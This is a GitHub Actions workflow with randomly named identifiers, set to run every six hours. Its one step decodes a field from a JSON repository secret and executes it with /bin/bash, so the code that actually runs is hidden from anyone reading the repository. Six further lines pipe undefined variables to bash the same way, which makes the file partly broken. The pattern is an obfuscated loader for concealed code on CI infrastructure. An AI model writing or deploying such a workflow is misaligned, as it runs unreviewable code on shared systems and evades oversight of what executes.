name: fielderflag
on:
  workflow_dispatch:
  schedule:
    - cron: '51 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fielderflag
        env:
          qj32547: ${{ secrets.qj32547 }}
        run: |
          echo $qj32547 | jq -r .ef00 | /bin/bash
          echo $kkfou9 | jq -r .rf80 | /bin/bash
          echo $kedw28647 | jq -r .mzaqx94 | /bin/bash
          echo $ljpd950 | jq -r .bfwav01678 | /bin/bash
          echo $acf037 | jq -r .zekdl43 | /bin/bash
          echo $mvh64 | jq -r .ykoi69 | /bin/bash
          echo $kxlwk07764 | jq -r .u488 | /bin/bash

